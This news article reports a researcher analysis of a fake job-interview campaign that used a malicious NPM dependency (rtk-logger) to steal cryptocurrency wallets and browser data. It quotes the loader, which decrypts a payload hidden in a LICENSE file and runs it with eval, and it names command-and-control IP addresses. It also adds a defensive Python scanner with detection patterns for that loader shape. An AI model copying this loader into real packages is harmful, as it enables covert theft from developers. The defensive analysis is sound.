A sophisticated cybercriminal operation disguised as a Ukrainian Web3 development team has been targeting job seekers through weaponized NPM packages, security researchers warn.
The attack leverages fake interview processes to trick unsuspecting candidates into downloading and executing malicious code that steals cryptocurrency wallets, browser data, and sensitive personal information.
The campaign centers around a seemingly legitimate GitHub repository called “EvaCodes-Community/UltraX,” which attackers present to prospective employees during first-round interviews.
Victims are instructed to clone and run the repository locally as part of a technical assessment. However, the project contains a malicious NPM dependency designed to harvest sensitive data from the target’s system.
On August 9, 2025, a community member approached SlowMist researchers after becoming suspicious of the repository’s contents during an interview process.
The security team’s subsequent analysis revealed the presence of a backdoor embedded within the project’s dependencies, confirming the malicious nature of what appeared to be a standard Web3 development repository.
SlowMist analysts identified that the attack initially used the NPM package “[email protected],” which was later replaced with “[email protected]” after the original package was removed by NPM’s security team.
The newer package, published on August 8, 2025, contains heavily obfuscated code designed to evade detection while maintaining the same malicious functionality.
The threat extends beyond individual victims, as the researchers discovered that two additional GitHub accounts had forked the malicious repository, suggesting a broader campaign targeting multiple potential victims across the Web3 job market.
Infection Mechanism and Code Execution
The malware’s infection vector relies on social engineering rather than technical exploitation, making it particularly dangerous for job seekers in the competitive Web3 space.
Once the victim clones the repository and executes “npm install,” the malicious rtk-logger package automatically triggers its payload through a sophisticated multi-stage process.
The package’s core malicious code resides in “/rtk-logger/lib/utils/smtp-connection/index.js,” which uses AES-256-CBC decryption to unlock obfuscated payloads stored in the LICENSE file.
The decryption process employs hardcoded keys and initialization vectors, allowing the malware to execute without additional network communication during initial deployment.
    const fs = require('fs');
    const path = require('path');
    const parseLib = require('./parse');               // AES-256-CBC decryption with hardcoded key and IV
    const filePath = path.join(__dirname, 'LICENSE');  // obfuscated payload is stored in the LICENSE file
    fs.readFile(filePath, 'utf8', (_, data) => {
        try {
            eval(parseLib(data));                      // decrypted payload is executed directly, no network needed
        } catch (err) {
            console.error('Error during parsing/eval:', err);
        }
    });
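As an added defender-side example (not SlowMist's tooling and not code from the UltraX repository), the following Python heuristic scans an installed node_modules tree for the loader shape shown above: a package that runs during npm install and whose code reads a LICENSE file, AES-decrypts it and passes the result to eval(). The indicator names and the sample package are constructed, and the postinstall hook in the sample is an assumption about how the install step triggers the package.

```python
"""Added defensive heuristic (not SlowMist's tooling): flag packages that run on `npm install`
and whose code reads a LICENSE file, AES-decrypts it and hands the result to eval()."""
import json
import re
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
INDICATORS = {  # heuristic markers of the loader shape, not signatures
    "eval": lambda c: re.search(r"\beval\s*\(|new\s+Function\s*\(", c) is not None,
    "aes-decrypt": lambda c: re.search(r"createDecipheriv|aes-256-cbc", c, re.I) is not None,
    "reads-LICENSE": lambda c: "readFile" in c and re.search(r"['\"]LICENSE['\"]", c) is not None,
}

def analyze_package(package_json: str, sources: dict) -> list:
    """Findings for one package; `sources` maps relative JS path -> content."""
    findings = []
    try:
        scripts = json.loads(package_json).get("scripts") or {}
    except (json.JSONDecodeError, AttributeError):
        return ["package.json unreadable"]
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append(f"runs on install via '{hook}': {scripts[hook]}")
    hits = {name: [p for p, c in sources.items() if test(c)] for name, test in INDICATORS.items()}
    # eval alone is noisy; eval fed from a decrypted non-code file is the loader shape
    if hits["eval"] and (hits["aes-decrypt"] or hits["reads-LICENSE"]):
        detail = "; ".join(f"{k} in {', '.join(v)}" for k, v in hits.items() if v)
        findings.append("eval of decrypted/opaque payload: " + detail)
    return findings

def scan_node_modules(root: str) -> dict:
    """Walk a node_modules directory; return {package_dir: findings} for flagged packages."""
    report = {}
    for pkg in Path(root).rglob("package.json"):
        base = pkg.parent  # nested node_modules are skipped here and get their own entry
        sources = {str(p.relative_to(base)): p.read_text(encoding="utf-8", errors="replace")
                   for p in base.rglob("*.js") if "node_modules" not in p.relative_to(base).parts}
        findings = analyze_package(pkg.read_text(encoding="utf-8", errors="replace"), sources)
        if findings:
            report[str(base)] = findings
    return report

# Constructed sample mirroring the loader quoted above; the postinstall hook is an assumption.
SAMPLE_PKG = json.dumps({"name": "sample-logger", "scripts": {"postinstall": "node lib/utils/smtp-connection/index.js"}})
SAMPLE_SOURCES = {
    "lib/utils/smtp-connection/index.js": "const fs=require('fs');const parseLib=require('./parse');"
        "fs.readFile(require('path').join(__dirname,'LICENSE'),'utf8',(_,d)=>{eval(parseLib(d))});",
    "lib/utils/smtp-connection/parse.js": "module.exports=d=>require('crypto').createDecipheriv('aes-256-cbc',K,IV).update(d,'base64','utf8');",
    "lib/index.js": "module.exports = { log: console.log };",
}
```

Running `npm install --ignore-scripts` before calling scan_node_modules on the resulting tree keeps lifecycle hooks from firing while the packages are inspected.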
After successful decryption, the malware establishes connections to command-and-control servers at 144.172.112.106 and 172.86.64.67, enabling remote access and data exfiltration capabilities while maintaining persistence through various system-level modifications.